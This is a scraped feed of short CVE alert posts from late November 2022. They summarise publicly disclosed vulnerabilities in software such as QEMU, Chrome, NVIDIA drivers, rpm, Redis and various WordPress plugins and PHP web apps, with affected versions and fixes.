🚨 CVE-2022-46146Prometheus Exporter Toolkit is a utility package to build exporters. Prior to versions 0.7.2 and 0.8.2, i someone has access to a Prometheus web.yml file and users' bcrypted passwords, they can bypass security by poisoning the built-in authentication cache. Versions 0.7.2 and 0.8.2 contain a fix for the issue. There is no workaround, but attacker must have access to the hashed password to use this functionality.🎖@cveNotify |
|
| 2022-11-29 22:02:18 |
🚨 CVE-2022-46150Discourse is an open-source discussion platform. Prior to version 2.8.13 of the `stable` branch and version 2.9.0.beta14 of the `beta` and `tests-passed` branches, unauthorized users may learn of the existence of hidden tags and that they have been applied to topics that they have access to. This issue is patched in version 2.8.13 of the `stable` branch and version 2.9.0.beta14 of the `beta` and `tests-passed` branches. As a workaround, use the `disable_email` site setting to disable all emails to non-staff users.🎖@cveNotify |
|
| 2022-11-29 22:02:17 |
🚨 CVE-2022-4172An integer overflow and buffer overflow issues were found in the ACPI Error Record Serialization Table (ERST) device of QEMU in the read_erst_record() and write_erst_record() functions. Both issues may allow the guest to overrun the host buffer allocated for the ERST memory device. A malicious guest could use these flaws to crash the QEMU process on the host.🎖@cveNotify |
|
| 2022-11-29 21:02:52 |
🚨 CVE-2022-4172An integer overflow and buffer overflow issues were found in the ACPI Error Record Serialization Table (ERST) device of QEMU in the read_erst_record() and write_erst_record() functions. Both issues may allow the guest to overrun the host buffer allocated for the ERST memory device. A malicious guest could use these flaws to crash the QEMU process on the host.🎖@cveNotify |
|
| 2022-11-29 21:02:51 |
🚨 CVE-2022-38163A Drag and Drop spoof vulnerability was discovered in F-Secure SAFE Browser for Android and iOS version 19.0 and below. Drag and drop operation by user on address bar could lead to a spoofing of the address bar.🎖@cveNotify |
|
| 2022-11-29 21:02:50 |
🚨 CVE-2021-35938A symbolic link issue was found in rpm. It occurs when rpm sets the desired permissions and credentials after installing a file. A local unprivileged user could use this flaw to exchange the original file with a symbolic link to a security-critical file and escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.🎖@cveNotify |
|
| 2022-11-29 21:02:49 |
🚨 CVE-2022-31777A stored cross-site scripting (XSS) vulnerability in Apache Spark 3.2.1 and earlier, and 3.3.0, allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the logs which would be returned in logs rendered in the UI.🎖@cveNotify |
|
| 2022-11-29 21:02:46 |
🚨 CVE-2022-21126The package com.github.samtools:htsjdk before 3.0.1 are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the createTempDir() function in util/IOUtil.java not checking for the existence of the temporary directory before attempting to create it.🎖@cveNotify |
|
| 2022-11-29 21:02:45 |
🚨 CVE-2022-25848This affects all versions of package static-dev-server. This is because when paths from users to the root directory are joined, the assets for the path accessed are relative to that of the root directory.🎖@cveNotify |
|
| 2022-11-29 21:02:44 |
🚨 CVE-2022-44355SolarView Compact 7.0 is vulnerable to Cross-site Scripting (XSS) via /network_test.php.🎖@cveNotify |
|
| 2022-11-29 21:02:43 |
🚨 CVE-2022-44356WAVLINK Quantum D4G (WL-WN531G3) running firmware versions M31G3.V5030.201204 and M31G3.V5030.200325 has an access control issue which allows unauthenticated attackers to download configuration data and log files.🎖@cveNotify |
|
| 2022-11-29 21:02:40 |
🚨 CVE-2022-46152OP-TEE Trusted OS is the secure side implementation of OP-TEE project, a Trusted Execution Environment. Versions prior to 3.19.0, contain an Improper Validation of Array Index vulnerability. The function `cleanup_shm_refs()` is called by both `entry_invoke_command()` and `entry_open_session()`. The commands `OPTEE_MSG_CMD_OPEN_SESSION` and `OPTEE_MSG_CMD_INVOKE_COMMAND` can be executed from the normal world via an OP-TEE SMC. This function is not validating the `num_params` argument, which is only limited to `OPTEE_MSG_MAX_NUM_PARAMS` (127) in the function `get_cmd_buffer()`. Therefore, an attacker in the normal world can craft an SMC call that will cause out-of-bounds reading in `cleanup_shm_refs` and potentially freeing of fake-objects in the function `mobj_put()`. A normal-world attacker with permission to execute SMC instructions may exploit this flaw. Maintainers believe this problem permits local privilege escalation from the normal world to the secure world. Version 3.19.0 contains a fix for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2022-11-29 21:02:39 |
🚨 CVE-2022-44635Apache Fineract allowed an authenticated user to perform remote code execution due to a path traversal vulnerability in a file upload component of Apache Fineract, allowing an attacker to run remote code. This issue affects Apache Fineract version 1.8.0 and prior versions. We recommend users to upgrade to 1.8.1.🎖@cveNotify |
|
| 2022-11-29 21:02:38 |
🚨 CVE-2022-3199Use after free in Frames in Google Chrome prior to 105.0.5195.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-29 21:02:34 |
🚨 CVE-2022-39028telnetd in GNU Inetutils through 2.3, MIT krb5-appl through 1.0.3, and derivative works has a NULL pointer dereference via 0xff 0xf7 or 0xff 0xf8. In a typical installation, the telnetd application would crash but the telnet service would remain available through inetd. However, if the telnetd application has many crashes within a short time interval, the telnet service would become unavailable after inetd logs a "telnet/tcp server failing (looping), service terminated" error. NOTE: MIT krb5-appl is not supported upstream but is shipped by a few Linux distributions. The affected code was removed from the supported MIT Kerberos 5 (aka krb5) product many years ago, at version 1.8.🎖@cveNotify |
|
| 2022-11-29 21:02:33 |
🚨 CVE-2022-4135Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-29 21:02:32 |
🚨 CVE-2021-35939It was found that the fix for CVE-2017-7500 and CVE-2017-7501 was incomplete: the check was only implemented for the parent directory of the file to be created. A local unprivileged user who owns another ancestor directory could potentially use this flaw to gain root privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.🎖@cveNotify |
|
| 2022-11-29 18:03:15 |
🚨 CVE-2022-31325There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.🎖@cveNotify |
|
| 2022-11-29 18:03:13 |
🚨 CVE-2022-41946pgjdbc is an open source postgresql JDBC Driver. In affected versions a prepared statement using either `PreparedStatement.setText(int, InputStream)` or `PreparedStatemet.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 2k. This will create a temporary file which is readable by other users on Unix like systems, but not MacOS. On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. Java 1.7 and higher users: this vulnerability is fixed in 4.5.0. Java 1.6 and lower users: no patch is available. If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will mitigate this vulnerability.🎖@cveNotify |
|
| 2022-11-29 18:03:12 |
🚨 CVE-2020-1712A heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially crafted dbus messages.🎖@cveNotify |
|
| 2022-11-29 18:03:11 |
🚨 CVE-2022-3647** DISPUTED ** A vulnerability, which was classified as problematic, was found in Redis. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The real existence of this vulnerability is still doubted at the moment. The name of the patch is 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. NOTE: The vendor claims that this is not a DoS because it applies to the crash logging mechanism which is triggered after a crash has occurred.🎖@cveNotify |
|
| 2022-11-29 18:03:07 |
🚨 CVE-2021-4207A flaw was found in the QXL display device emulation in QEMU. A double fetch of guest controlled values `cursor->header.width` and `cursor->header.height` can lead to the allocation of a small cursor object followed by a subsequent heap-based buffer overflow. A malicious privileged guest user could use this flaw to crash the QEMU process on the host or potentially execute arbitrary code within the context of the QEMU process.🎖@cveNotify |
|
| 2022-11-29 18:03:06 |
🚨 CVE-2022-31615NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2022-11-29 18:03:04 |
🚨 CVE-2022-46146Prometheus Exporter Toolkit is a utility package to build exporters. Prior to versions 0.7.2 and 0.8.2, i someone has access to a Prometheus web.yml file and users' bcrypted passwords, they can bypass security by poisoning the built-in authentication cache. Versions 0.7.2 and 0.8.2 contain a fix for the issue. There is no workaround, but attacker must have access to the hashed password to use this functionality.🎖@cveNotify |
|
| 2022-11-29 18:03:03 |
🚨 CVE-2011-3389The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.🎖@cveNotify |
|
| 2022-11-29 18:02:59 |
🚨 CVE-2022-2294Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2022-11-29 18:02:58 |
🚨 CVE-2022-2868libtiff's tiffcrop utility has a improper input validation flaw that can lead to out of bounds read and ultimately cause a crash if an attacker is able to supply a crafted file to tiffcrop.🎖@cveNotify |
|
| 2022-11-29 18:02:57 |
🚨 CVE-2022-31613NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where any local user can cause a null-pointer dereference, which may lead to a kernel panic.🎖@cveNotify |
|
| 2022-11-29 18:02:52 |
🚨 CVE-2022-31610NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where a local user with basic capabilities can cause an out-of-bounds write, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.🎖@cveNotify |
|
| 2022-11-29 18:02:51 |
🚨 CVE-2022-31607NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where a local user with basic capabilities can cause improper input validation, which may lead to denial of service, escalation of privileges, data tampering, and limited information disclosure.🎖@cveNotify |
|
| 2022-11-29 18:02:50 |
🚨 CVE-2022-34665NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2022-11-29 18:02:49 |
🚨 CVE-2022-31617NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where a local user with basic capabilities can cause an out-of-bounds read, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.🎖@cveNotify |
|
| 2022-11-29 16:02:16 |
🚨 CVE-2022-36433The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save.🎖@cveNotify |
|
| 2022-11-29 16:02:14 |
🚨 CVE-2022-4202A vulnerability, which was classified as problematic, was found in GPAC 2.1-DEV-rev490-g68064e101-master. Affected is the function lsr_translate_coords of the file laser/lsr_dec.c. The manipulation leads to integer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214518 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-11-29 16:02:13 |
🚨 CVE-2022-45301Insecure permissions in Chocolatey Ruby package v3.1.2.1 and below grants all users in the Authenticated Users group write privileges for the path C:\tools\ruby31 and all files located in that folder.🎖@cveNotify |
|
| 2022-11-29 16:02:11 |
🚨 CVE-2022-45304Insecure permissions in Chocolatey Cmder package v1.3.20 and below grants all users in the Authenticated Users group write privileges for the path C:\tools\Cmder and all files located in that folder.🎖@cveNotify |
|
| 2022-11-29 16:02:10 |
🚨 CVE-2022-45305Insecure permissions in Chocolatey Python3 package v3.11.0 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\Python311 and all files located in that folder.🎖@cveNotify |
|
| 2022-11-29 16:02:09 |
🚨 CVE-2022-45306Insecure permissions in Chocolatey Azure-Pipelines-Agent package v2.211.1 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\agent and all files located in that folder.🎖@cveNotify |
|
| 2022-11-29 16:02:06 |
🚨 CVE-2022-32966RTL8168FP-CG Dash remote management function has missing authorization. An unauthenticated attacker within the adjacent network can connect to DASH service port to disrupt service.🎖@cveNotify |
|
| 2022-11-29 16:02:05 |
🚨 CVE-2022-32967RTL8111EP-CG/RTL8111FP-CG DASH function has hard-coded password. An unauthenticated physical attacker can use the hard-coded default password during system reboot triggered by other user, to acquire partial system information such as serial number and server information.🎖@cveNotify |
|
| 2022-11-29 16:02:04 |
🚨 CVE-2022-36136ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.🎖@cveNotify |
|
| 2022-11-29 16:02:03 |
🚨 CVE-2022-36137ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.🎖@cveNotify |
|
| 2022-11-29 16:02:01 |
🚨 CVE-2022-41675A remote attacker with general user privilege can inject malicious code in the form content of Raiden MAILD Mail Server website. Other users export form content as CSV file can trigger arbitrary code execution and allow the attacker to perform arbitrary system operation or disrupt service on the user side.🎖@cveNotify |
|
| 2022-11-29 16:02:00 |
🚨 CVE-2022-42099KLiK SocialMediaWebsite Version 1.0.1 has XSS vulnerabilities that allow attackers to store XSS via location Forum Subject input.🎖@cveNotify |
|
| 2022-11-29 16:01:58 |
🚨 CVE-2022-42100KLiK SocialMediaWebsite Version 1.0.1 has XSS vulnerabilities that allow attackers to store XSS via location input reply-form.🎖@cveNotify |
|
| 2022-11-29 16:01:57 |
🚨 CVE-2022-42109Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.🎖@cveNotify |
|
| 2022-11-29 16:01:56 |
🚨 CVE-2022-44037An access control issue in APsystems ENERGY COMMUNICATION UNIT (ECU-C) Power Control Software V4.1NA, V3.11.4, W2.1NA, V4.1SAA, C1.2.2 allows attackers to access sensitive data and execute specific commands and functions with full admin rights without authenticating allows him to perform multiple attacks, such as attacking wireless network in the product's range.🎖@cveNotify |
|
| 2022-11-29 16:01:55 |
🚨 CVE-2022-44038Russound XSourcePlayer 777D v06.08.03 was discovered to contain a remote code execution vulnerability via the scriptRunner.cgi component.🎖@cveNotify |
|
| 2022-11-29 16:01:54 |
🚨 CVE-2022-45202GPAC v2.1-DEV-rev428-gcb8ae46c8-master was discovered to contain a stack overflow via the function dimC_box_read at isomedia/box_code_3gpp.c.🎖@cveNotify |
|
| 2022-11-29 16:01:52 |
🚨 CVE-2022-45204GPAC v2.1-DEV-rev428-gcb8ae46c8-master was discovered to contain a memory leak via the function dimC_box_read at isomedia/box_code_3gpp.c.🎖@cveNotify |
|
| 2022-11-29 12:01:57 |
🚨 CVE-2022-3734** DISPUTED ** A vulnerability was found in a port or fork of Redis. It has been declared as critical. This vulnerability affects unknown code in the library C:/Program Files/Redis/dbghelp.dll. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier of this vulnerability is VDB-212416. NOTE: The official Redis release is not affected. This issue might affect an unofficial fork or port on Windows only.🎖@cveNotify |
|
| 2022-11-29 12:01:56 |
🚨 CVE-2022-4202A vulnerability, which was classified as problematic, was found in GPAC 2.1-DEV-rev490-g68064e101-master. Affected is the function lsr_translate_coords of the file laser/lsr_dec.c. The manipulation leads to integer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214518 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-11-29 07:02:00 |
🚨 CVE-2022-30974compile in regexp.c in Artifex MuJS through 1.2.0 results in stack consumption because of unlimited recursion, a different issue than CVE-2019-11413.🎖@cveNotify |
|
| 2022-11-29 07:01:59 |
🚨 CVE-2022-30975In Artifex MuJS through 1.2.0, jsP_dumpsyntax in jsdump.c has a NULL pointer dereference, as demonstrated by mujs-pp.🎖@cveNotify |
|
| 2022-11-29 07:01:58 |
🚨 CVE-2020-5517CSRF in the /login URI in BlueOnyx 5209R allows an attacker to access the dashboard and perform scraping or other analysis.🎖@cveNotify |
|
| 2022-11-29 07:01:57 |
🚨 CVE-2018-2771Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2022-11-29 07:01:56 |
🚨 CVE-2020-29506Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain an Observable Timing Discrepancy Vulnerability.🎖@cveNotify |
|
| 2022-11-29 07:01:55 |
🚨 CVE-2020-29507Dell BSAFE Crypto-C Micro Edition, versions before 4.1.4, and Dell BSAFE Micro Edition Suite, versions before 4.4, contain an Improper Input Validation Vulnerability.🎖@cveNotify |
|
| 2022-11-29 07:01:54 |
🚨 CVE-2020-29508Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Improper Input Validation Vulnerability.🎖@cveNotify |
|
| 2022-11-29 07:01:53 |
🚨 CVE-2020-35163Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain a Use of Insufficiently Random Values Vulnerability.🎖@cveNotify |
|
| 2022-11-29 00:02:27 |
🚨 CVE-2022-4128A NULL pointer dereference issue was discovered in the Linux kernel in the MPTCP protocol when traversing the subflow list at disconnect time. A local user could use this flaw to potentially crash the system causing a denial of service.🎖@cveNotify |
|
| 2022-11-29 00:02:26 |
🚨 CVE-2022-4129A flaw was found in the Linux kernel's Layer 2 Tunneling Protocol (L2TP). A missing lock when clearing sk_user_data can lead to a race condition and NULL pointer dereference. A local user could use this flaw to potentially crash the system causing a denial of service.🎖@cveNotify |
|
| 2022-11-29 00:02:25 |
🚨 CVE-2021-3982Linux distributions using CAP_SYS_NICE for gnome-shell may be exposed to a privilege escalation issue. An attacker, with low privilege permissions, may take advantage of the way CAP_SYS_NICE is currently implemented and eventually load code to increase its process scheduler priority leading to possible DoS of other services running in the same machine.🎖@cveNotify |
|
| 2022-11-29 00:02:21 |
🚨 CVE-2022-45473In drachtio-server 0.8.18, /var/log/drachtio has mode 0777 and drachtio.log has mode 0666.🎖@cveNotify |
|
| 2022-11-29 00:02:20 |
🚨 CVE-2022-41916Heimdal is an implementation of ASN.1/DER, PKIX, and Kerberos. Versions prior to 7.7.1 are vulnerable to a denial of service vulnerability in Heimdal's PKI certificate validation library, affecting the KDC (via PKINIT) and kinit (via PKINIT), as well as any third-party applications using Heimdal's libhx509. Users should upgrade to Heimdal 7.7.1 or 7.8. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-11-29 00:02:19 |
🚨 CVE-2022-1785Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.4977.🎖@cveNotify |
|
| 2022-11-29 00:02:18 |
🚨 CVE-2022-29930SHA1 implementation in JetBrains Ktor Native 2.0.0 was returning the same value. The issue was fixed in Ktor version 2.0.1.🎖@cveNotify |
|
| 2022-11-29 00:02:14 |
🚨 CVE-2018-10753Stack-based buffer overflow in the delayed_output function in music.c in abcm2ps through 8.13.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact.🎖@cveNotify |
|
| 2022-11-29 00:02:13 |
🚨 CVE-2018-3847Multiple exploitable buffer overflow vulnerabilities exist in image parsing functionality of the CFITSIO library version 3.42. Specially crafted images parsed via the library, can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can deliver an FIT image to trigger this vulnerability and potentially gain code execution.🎖@cveNotify |
|
| 2022-11-29 00:02:12 |
🚨 CVE-2019-1010069moinejf abcm2ps 8.13.20 is affected by: Incorrect Access Control. The impact is: Allows attackers to cause a denial of service attack via a crafted file. The component is: front.c, function txt_add. The fixed version is: after commit commit 08aef597656d065e86075f3d53fda89765845eae.🎖@cveNotify |
|
| 2022-11-29 00:02:11 |
🚨 CVE-2018-3846In the ffgphd and ffgtkn functions in NASA CFITSIO 3.42, specially crafted images parsed via the library can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can deliver an FIT image to trigger this vulnerability and potentially gain code execution.🎖@cveNotify |
|
| 2022-11-29 00:02:07 |
🚨 CVE-2018-3855In Hyland Perceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux, a crafted OpenDocument document can lead to a SkCanvas object double free resulting in direct code execution.🎖@cveNotify |
|
| 2022-11-29 00:02:06 |
🚨 CVE-2021-43034An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A world writable file allowed local users to execute arbitrary code as the user apache, leading to privilege escalation.🎖@cveNotify |
|
| 2022-11-29 00:02:05 |
🚨 CVE-2021-43035An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. Two unauthenticated SQL injection vulnerabilities were discovered, allowing arbitrary SQL queries to be injected and executed under the postgres superuser account. Remote code execution was possible, leading to full access to the postgres user account.🎖@cveNotify |
|
| 2022-11-28 23:01:53 |
🚨 CVE-2022-44858Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/products/view_product.php.🎖@cveNotify |
|
| 2022-11-28 23:01:52 |
🚨 CVE-2022-44860Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/transactions/update_status.php.🎖@cveNotify |
|
| 2022-11-28 23:01:51 |
🚨 CVE-2022-44859Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/admin/products/manage_product.php.🎖@cveNotify |
|
| 2022-11-28 20:02:22 |
🚨 CVE-2022-4169The Theme and plugin translation for Polylang is vulnerable to authorization bypass in versions up to, and including, 3.2.16 due to missing capability checks in the process_polylang_theme_translation_wp_loaded() function. This makes it possible for unauthenticated attackers to update plugin and theme translation settings and to import translation strings.🎖@cveNotify |
|
| 2022-11-28 20:02:21 |
🚨 CVE-2021-45036Velneo vClient on its 28.1.3 version, could allow an attacker with knowledge of the victims's username and hashed password to spoof the victim's id against the server.🎖@cveNotify |
|
| 2022-11-28 20:02:20 |
🚨 CVE-2022-44399Poultry Farm Management System v1.0 contains a SQL injection vulnerability via the del parameter at /Redcock-Farm/farm/category.php.🎖@cveNotify |
|
| 2022-11-28 20:02:19 |
🚨 CVE-2009-1142An issue was discovered in open-vm-tools 2009.03.18-154848. Local users can gain privileges via a symlink attack on /tmp files if vmware-user-suid-wrapper is setuid root and the ChmodChownDirectory function is enabled.🎖@cveNotify |
|
| 2022-11-28 20:02:18 |
🚨 CVE-2021-35284SQL Injection vulnerability in function get_user in login_manager.php in rizalafani cms-php v1.🎖@cveNotify |
|
| 2022-11-28 20:02:16 |
🚨 CVE-2009-1143An issue was discovered in open-vm-tools 2009.03.18-154848. Local users can bypass intended access restrictions on mounting shares via a symlink attack that leverages a realpath race condition in mount.vmhgfs (aka hgfsmounter).🎖@cveNotify |
|
| 2022-11-28 20:02:15 |
🚨 CVE-2022-38115Insecure method vulnerability in which allowed HTTP methods are disclosed. E.g., OPTIONS, DELETE, TRACE, and PUT🎖@cveNotify |
|
| 2022-11-28 20:02:14 |
🚨 CVE-2022-38114This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.🎖@cveNotify |
|
| 2022-11-28 20:02:13 |
🚨 CVE-2022-38113This vulnerability discloses build and services versions in the server response header.🎖@cveNotify |
|
| 2022-11-28 20:02:12 |
🚨 CVE-2022-39348Twisted is an event-based framework for internet applications. Started with version 0.9.4, when the host header does not match a configured host `twisted.web.vhost.NameVirtualHost` will return a `NoResource` resource which renders the Host header unescaped into the 404 response allowing HTML and script injection. In practice this should be very difficult to exploit as being able to modify the Host header of a normal HTTP request implies that one is already in a privileged position. This issue was fixed in version 22.10.0rc1. There are no known workarounds.🎖@cveNotify |
|
| 2022-11-28 20:02:10 |
🚨 CVE-2022-35501Stored Cross-site Scripting (XSS) exists in the Amasty Blog Pro 2.10.3 and 2.10.4 plugin for Magento 2 because of the duplicate post function.🎖@cveNotify |
|
| 2022-11-28 20:02:09 |
🚨 CVE-2021-25220BIND 9.11.0 -> 9.11.36 9.12.0 -> 9.16.26 9.17.0 -> 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -> 9.11.36-S1 9.16.8-S1 -> 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients.🎖@cveNotify |
|
| 2022-11-28 20:02:08 |
🚨 CVE-2021-35246The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption and use the application as a platform for attacks against its users.🎖@cveNotify |
|
| 2022-11-28 20:02:06 |
🚨 CVE-2022-2928In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option's refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort.🎖@cveNotify |
|
| 2022-11-28 20:02:03 |
🚨 CVE-2022-44280Automotive Shop Management System v1.0 is vulnerable to Delete any file via /asms/classes/Master.php?f=delete_img.🎖@cveNotify |
|
| 2022-11-28 20:02:01 |
🚨 CVE-2022-44278Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=user/manage_user&id=.🎖@cveNotify |
|
| 2022-11-28 20:01:58 |
🚨 CVE-2022-3500A vulnerability was found in keylime. This security issue happens in some circumstances, due to some improperly handled exceptions, there exists the possibility that a rogue agent could create errors on the verifier that stopped attestation attempts for that host leaving it in an attested state but not verifying that anymore.🎖@cveNotify |
|
| 2022-11-28 20:01:56 |
🚨 CVE-2022-30257An issue was discovered in Technitium DNS Server through 8.0.2 that allows variant V1 of unintended domain name resolution. A revoked domain name can still be resolvable for a long time, including expired domains and taken-down malicious domains. The effects of an exploit would be widespread and highly impactful, because the exploitation conforms to de facto DNS specifications and operational practices, and overcomes current mitigation patches for "Ghost" domain names.🎖@cveNotify |
|
| 2022-11-28 20:01:54 |
🚨 CVE-2022-30258An issue was discovered in Technitium DNS Server through 8.0.2 that allows variant V2 of unintended domain name resolution. A revoked domain name can still be resolvable for a long time, including expired domains and taken-down malicious domains. The effects of an exploit would be widespread and highly impactful, because the exploitation conforms to de facto DNS specifications and operational practices, and overcomes current mitigation patches for "Ghost" domain names.🎖@cveNotify |
|
| 2022-11-28 20:01:53 |
🚨 CVE-2022-40954Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Spark Provider, Apache Airflow allows an attacker to read arbtrary files in the task execution context, without write access to DAG files. This issue affects Spark Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Spark Provider is installed (Spark Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Spark Provider version 4.0.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version that has lower version of the Spark Provider installed).🎖@cveNotify |
|
| 2022-11-28 17:02:22 |
🚨 CVE-2022-3839The Analytics for WP WordPress plugin through 1.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-11-28 17:02:21 |
🚨 CVE-2022-39397aliyun-oss-client is a rust client for Alibaba Cloud OSS. Users of this library will be affected, the incoming secret will be disclosed unintentionally. This issue has been patched in version 0.8.1.🎖@cveNotify |
|
| 2022-11-28 17:02:20 |
🚨 CVE-2022-3610The Jeeng Push Notifications WordPress plugin before 2.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2022-11-28 17:02:19 |
🚨 CVE-2022-3689The HTML Forms WordPress plugin before 1.3.25 does not properly properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users🎖@cveNotify |
|
| 2022-11-28 17:02:15 |
🚨 CVE-2022-3824The WP Admin UI Customize WordPress plugin before 1.5.13 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-11-28 17:02:14 |
🚨 CVE-2022-3601The Image Hover Effects Css3 WordPress plugin through 4.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-11-28 17:02:13 |
🚨 CVE-2022-3823The Beautiful Cookie Consent Banner WordPress plugin before 2.9.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
